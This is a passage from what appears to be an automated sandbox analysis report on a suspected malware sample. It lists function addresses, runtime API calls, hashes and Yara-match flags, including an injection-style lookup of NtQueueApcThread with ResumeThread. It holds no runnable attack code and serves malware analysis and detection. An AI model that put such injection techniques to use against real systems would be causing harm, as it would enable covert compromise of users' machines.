                                                                  • Opcode Fuzzy Hash: d822beeafb31d47687cbbf35900d7bfd8460a788cd57ec4d81b27c9478e24994
                                                                  • Instruction Fuzzy Hash: D44137223047928BDF1ADB6AE950B6E2754F74ABC4F804525EF6A4B716DF38D823C700
                                                                  Function 0099EE74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htonl$freemalloc
                                                                  • String ID: zyxwvutsrqponmlk
                                                                  • API String ID: 1249573706-3884694604
                                                                  • Opcode ID: 60e827709e15f071cf2e6c3d2d1b9052fe80b1463481f4d5e0851a6ab7a4111b
                                                                  • Instruction ID: 327484793c1fc5fa5ec397f63ce080f97706cf6054b575f91b683f279f9b0e37
                                                                  • Opcode Fuzzy Hash: 60e827709e15f071cf2e6c3d2d1b9052fe80b1463481f4d5e0851a6ab7a4111b
                                                                  • Instruction Fuzzy Hash: AC21072230174442EF14EF7AA95136E6BD5EBDABD4F044439AE5A87B57EF3CC8468340
                                                                  Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: signal
                                                                  • String ID: CCG
                                                                  • API String ID: 1946981877-1584390748
                                                                  • Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                                                                  • Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
                                                                  • Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                                                                  • Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E
                                                                  Function 009A24E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderthreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcResumeThread
                                                                  • String ID: NtQueueApcThread$ntdll
                                                                  • API String ID: 682313787-1374908105
                                                                  • Opcode ID: e7e6c475633100eece6753356ed918a7e6f8eaece10a8f42ca503db20b9cac72
                                                                  • Instruction ID: c9083cdda2e8153679a90e63f1ad3b3c0964f2a54dbea64e847755a8f4427423
                                                                  • Opcode Fuzzy Hash: e7e6c475633100eece6753356ed918a7e6f8eaece10a8f42ca503db20b9cac72
                                                                  • Instruction Fuzzy Hash: 6B01A221704B8182EB008B5AF990399B3A4F789BE0F984531EF6947B65DF38C4518700
                                                                  Function 009A1254 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A1276
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • _snprintf.LIBCMT ref: 009A1295
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • remove.LIBCMT ref: 009A12A1
                                                                  • remove.LIBCMT ref: 009A12A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                                  • String ID: %s\%s
                                                                  • API String ID: 1896346573-4073750446
                                                                  • Opcode ID: ffc5b049335742fc71228dd6e777388c78786af3e347fc27d6e655662866bbaa
                                                                  • Instruction ID: 1bc876bdf174efb02393a7dc203a30beeef7094a0b798cab8557b0419ff11220
                                                                  • Opcode Fuzzy Hash: ffc5b049335742fc71228dd6e777388c78786af3e347fc27d6e655662866bbaa
                                                                  • Instruction Fuzzy Hash: 07F05E21A09B9085D600AB52B8113AEA764E7C6BD0F684621FF9957B1ACF3CC55187C4
                                                                  Function 0354BEBB Relevance: 7.8, APIs: 6, Instructions: 347COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 03553B67: malloc.LIBCMT ref: 03553B83
                                                                  • malloc.LIBCMT ref: 0354BF65
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                    • Part of subcall function 0355A047: malloc.LIBCMT ref: 0355A097
                                                                    • Part of subcall function 0355A047: realloc.LIBCMT ref: 0355A0A6
                                                                  • malloc.LIBCMT ref: 0354C057
                                                                  • _snprintf.LIBCMT ref: 0354C0D5
                                                                  • _snprintf.LIBCMT ref: 0354C0FD
                                                                  • _snprintf.LIBCMT ref: 0354C124
                                                                  • free.LIBCMT ref: 0354C292
                                                                    • Part of subcall function 035586F3: malloc.LIBCMT ref: 03558727
                                                                    • Part of subcall function 035586F3: free.LIBCMT ref: 035588DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
                                                                  • String ID:
                                                                  • API String ID: 2667508507-0
                                                                  • Opcode ID: 479da97b01b779146c38a62a3070aff10b568b1b266dc2a7db8f21ac3f222f97
                                                                  • Instruction ID: e6700915baf5bdd304c4d27521335cd3ab1ccbcbfc891a5974561e9808332d5d
                                                                  • Opcode Fuzzy Hash: 479da97b01b779146c38a62a3070aff10b568b1b266dc2a7db8f21ac3f222f97
                                                                  • Instruction Fuzzy Hash: 23A1A3347187054BDB18FB74B8A567D72F6FBD9210F44452EAC4ACB2B1EE38E9058782
                                                                  Function 0354FD7F Relevance: 7.7, APIs: 5, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 03553B67: malloc.LIBCMT ref: 03553B83
                                                                    • Part of subcall function 0355BA07: _errno.LIBCMT ref: 0355B95E
                                                                    • Part of subcall function 0355BA07: _invalid_parameter_noinfo.LIBCMT ref: 0355B969
                                                                  • fseek.LIBCMT ref: 0354FE1B
                                                                    • Part of subcall function 0355C28B: _errno.LIBCMT ref: 0355C2B3
                                                                    • Part of subcall function 0355C28B: _invalid_parameter_noinfo.LIBCMT ref: 0355C2BE
                                                                  • _ftelli64.LIBCMT ref: 0354FE23
                                                                    • Part of subcall function 0355C2FF: _errno.LIBCMT ref: 0355C31D
                                                                    • Part of subcall function 0355C2FF: _invalid_parameter_noinfo.LIBCMT ref: 0355C328
                                                                  • fseek.LIBCMT ref: 0354FE33
                                                                    • Part of subcall function 0355C28B: _fseek_nolock.LIBCMT ref: 0355C2DC
                                                                  • malloc.LIBCMT ref: 0354FE73
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • fclose.LIBCMT ref: 0354FF30
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                                                                  • String ID:
                                                                  • API String ID: 2887643383-0
                                                                  • Opcode ID: 7b4d7289a34a9255c824d7eaa77b2ff1df567971f9fd99a7ac6ed81b33217d28
                                                                  • Instruction ID: bc90997f5803adebf97e72d4bb69f2a3d37aeb350eaf213d45a2ffe2ef098cf3
                                                                  • Opcode Fuzzy Hash: 7b4d7289a34a9255c824d7eaa77b2ff1df567971f9fd99a7ac6ed81b33217d28
                                                                  • Instruction Fuzzy Hash: 7A51A535718B084FC74DEB2CB45567973E5FBD9304B40466EE48BC72A5EE34A90287C6
                                                                  Function 0356553B Relevance: 7.7, APIs: 5, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _mtinitlocknum.LIBCMT ref: 03565568
                                                                    • Part of subcall function 0355F03F: _FF_MSGBANNER.LIBCMT ref: 0355F05C
                                                                    • Part of subcall function 0355F03F: _NMSG_WRITE.LIBCMT ref: 0355F066
                                                                  • _lock.LIBCMT ref: 0356557B
                                                                  • _lock.LIBCMT ref: 035655D6
                                                                  • _calloc_crt.LIBCMT ref: 0356568D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _lock$_calloc_crt_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 3962633935-0
                                                                  • Opcode ID: 3f7d7383109a2b023e6d9ae3b720316474c0133ef7fa5bdb011a38a708de0ad6
                                                                  • Instruction ID: ff454658f5f5fe93ed4bbc2ffd01c34688428b6e41066f7f0d78eb2dc88feb5f
                                                                  • Opcode Fuzzy Hash: 3f7d7383109a2b023e6d9ae3b720316474c0133ef7fa5bdb011a38a708de0ad6
                                                                  • Instruction Fuzzy Hash: C751F670558B098FD718DF18E895265B7E4FB99310F150A9EE88BC7271EB34E942CBC2
                                                                  Function 03544937 Relevance: 7.7, APIs: 6, Instructions: 175COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 03544981
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • malloc.LIBCMT ref: 0354498C
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A703
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A708
                                                                  • free.LIBCMT ref: 03544A73
                                                                  • free.LIBCMT ref: 03544A7B
                                                                  • free.LIBCMT ref: 03544A87
                                                                  • free.LIBCMT ref: 03544A94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: ddbb960c4c1ee8468c6250dc08bf5515ef5a4ba7345911af3a06a17fc36967dd
                                                                  • Instruction ID: 45cd164caa81ada7534d1412b0e0fd97d93be906a21f5a2cdc87452d9a4b7a43
                                                                  • Opcode Fuzzy Hash: ddbb960c4c1ee8468c6250dc08bf5515ef5a4ba7345911af3a06a17fc36967dd
                                                                  • Instruction Fuzzy Hash: 9A41F57561CB0E4BD72DEA6A684663B72DAFBD6254714026ED887C3222EE20D80787C5
                                                                  Function 0355C044 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355BF3E
                                                                  • memcpy_s.LIBCMT ref: 0355C003
                                                                  • _fileno.LIBCMT ref: 0355C06E
                                                                    • Part of subcall function 03560C3B: _errno.LIBCMT ref: 03560C44
                                                                    • Part of subcall function 03560C3B: _invalid_parameter_noinfo.LIBCMT ref: 03560C4F
                                                                    • Part of subcall function 0356211F: __doserrno.LIBCMT ref: 03562159
                                                                    • Part of subcall function 0356211F: _errno.LIBCMT ref: 03562160
                                                                  • _filbuf.LIBCMT ref: 0355C09C
                                                                  • _errno.LIBCMT ref: 0355C0EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1812282339-0
                                                                  • Opcode ID: 8b1461345f166dcaacafda40ee5fb0560b219fd4bf31384df6ca32e7d4f873f7
                                                                  • Instruction ID: 5d750fb2f1ae04abe1bbce01d8645831f0a309128be2f47c7c98dc05aea1cf4f
                                                                  • Opcode Fuzzy Hash: 8b1461345f166dcaacafda40ee5fb0560b219fd4bf31384df6ca32e7d4f873f7
                                                                  • Instruction Fuzzy Hash: 5A41943636CB054B962CD62C6469139B2D1F7D5721718072FE89AC32B1DE60F85286C6
                                                                  Function 0355D4DB Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _fileno.LIBCMT ref: 0355D4F8
                                                                    • Part of subcall function 03560C3B: _errno.LIBCMT ref: 03560C44
                                                                    • Part of subcall function 03560C3B: _invalid_parameter_noinfo.LIBCMT ref: 03560C4F
                                                                  • _errno.LIBCMT ref: 0355D508
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _errno.LIBCMT ref: 0355D524
                                                                  • _isatty.LIBCMT ref: 0355D585
                                                                  • _getbuf.LIBCMT ref: 0355D591
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                                                                  • String ID:
                                                                  • API String ID: 304646821-0
                                                                  • Opcode ID: a7a29ed1146a2838a1a953b545c0c20c3df8c09792cabfb42726ced0f4b7ec54
                                                                  • Instruction ID: 12ea584ec754801970c8220f137ccd6f3ff7f910967738d0a4d2c109ccc50dbb
                                                                  • Opcode Fuzzy Hash: a7a29ed1146a2838a1a953b545c0c20c3df8c09792cabfb42726ced0f4b7ec54
                                                                  • Instruction Fuzzy Hash: C341C371114B094FDB58EF6CE4E162577F0FB88314F58069AEC5ACB2A6E674E881C7C1
                                                                  Function 03556BE3 Relevance: 7.6, APIs: 6, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 03556C12
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • _snprintf.LIBCMT ref: 03556C2A
                                                                    • Part of subcall function 0355AA23: _errno.LIBCMT ref: 0355AA5A
                                                                    • Part of subcall function 0355AA23: _invalid_parameter_noinfo.LIBCMT ref: 0355AA65
                                                                  • free.LIBCMT ref: 03556C41
                                                                    • Part of subcall function 0355A62F: _errno.LIBCMT ref: 0355A64F
                                                                  • malloc.LIBCMT ref: 03556C91
                                                                  • _snprintf.LIBCMT ref: 03556CA9
                                                                  • free.LIBCMT ref: 03556CD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 761449704-0
                                                                  • Opcode ID: 7769da5689e5036543463322d8dc2953687d35e842421fa7a79a909f037a7b7e
                                                                  • Instruction ID: b7058eee65ef5992ecc5daa99e0bd70fd8ce7dab66ff7b464e69fd15658776d5
                                                                  • Opcode Fuzzy Hash: 7769da5689e5036543463322d8dc2953687d35e842421fa7a79a909f037a7b7e
                                                                  • Instruction Fuzzy Hash: 6731862071CA8D0FD769EB6C782527477E2F789310784569FE48EC3266EE24EC5287C5
                                                                  Function 009AC5CC Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1640621425-0
                                                                  • Opcode ID: f89985f424ce9c22c43889eabc5058f2aa413770285343a9214468ff08af004a
                                                                  • Instruction ID: 79faf5b4c66204adae0e0b3514c6f4fac557a2357577a1875704a8ce8ba80ad4
                                                                  • Opcode Fuzzy Hash: f89985f424ce9c22c43889eabc5058f2aa413770285343a9214468ff08af004a
                                                                  • Instruction Fuzzy Hash: 033168B130078586DE28DE27964022EB655FB46FE0F189630DF664FB81EB7CC88187C0
                                                                  Function 009954F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0099553A
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • malloc.LIBCMT ref: 00995545
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB2BC
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2C1
                                                                  • free.LIBCMT ref: 0099562C
                                                                  • free.LIBCMT ref: 00995634
                                                                  • free.LIBCMT ref: 00995640
                                                                  • free.LIBCMT ref: 0099564D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 996410232-0
                                                                  • Opcode ID: ad7a18b5cb1adff7d6ed1ba8d34c42f9090e139c4094cc48844a1b376a1b96a1
                                                                  • Instruction ID: 28aec28d9750f9c93480a0ec88d2e7cc2255e60442756d1ea42146bbbf172913
                                                                  • Opcode Fuzzy Hash: ad7a18b5cb1adff7d6ed1ba8d34c42f9090e139c4094cc48844a1b376a1b96a1
                                                                  • Instruction Fuzzy Hash: 9E312B22304B8546DF16EF2EA81472F6B59F7A6BC8F8A4021DD458B716EF38C947C300
                                                                  Function 009B6A44 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 2998201375-0
                                                                  • Opcode ID: acbc039f2ec1fa7f9a161c65c4e844387fcccdc5e67f3ee5a67b1b2bba6280d5
                                                                  • Instruction ID: c71268395cd3163f8a6f23afcb41e6d3105231877ac409bbcc2f3c1652938c1c
                                                                  • Opcode Fuzzy Hash: acbc039f2ec1fa7f9a161c65c4e844387fcccdc5e67f3ee5a67b1b2bba6280d5
                                                                  • Instruction Fuzzy Hash: A331A93231978086DB20CF15E6807A9BBB9F785FE4F188126EB8997B55DB3CD851CB00
                                                                  Function 0354EC57 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0354EC78
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • free.LIBCMT ref: 0354ECB3
                                                                  • fwrite.LIBCMT ref: 0354ECF4
                                                                  • fclose.LIBCMT ref: 0354ECFC
                                                                  • free.LIBCMT ref: 0354ED09
                                                                    • Part of subcall function 0355A62F: _errno.LIBCMT ref: 0355A64F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                                  • String ID:
                                                                  • API String ID: 1696598829-0
                                                                  • Opcode ID: d33f83733c51049a4a4ade9dbf2abdbacb1bb332e5f6c2cf96a65aab921b9820
                                                                  • Instruction ID: e627948beb357ee2bb31f114f1c75fea06d1104a764745ae6f779f223a188730
                                                                  • Opcode Fuzzy Hash: d33f83733c51049a4a4ade9dbf2abdbacb1bb332e5f6c2cf96a65aab921b9820
                                                                  • Instruction Fuzzy Hash: B9218434628F0E4FC749F76CB46436DB2E1FBD8254F44066EA84EC72A4ED38E9018386
                                                                  Function 0099D0D8 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
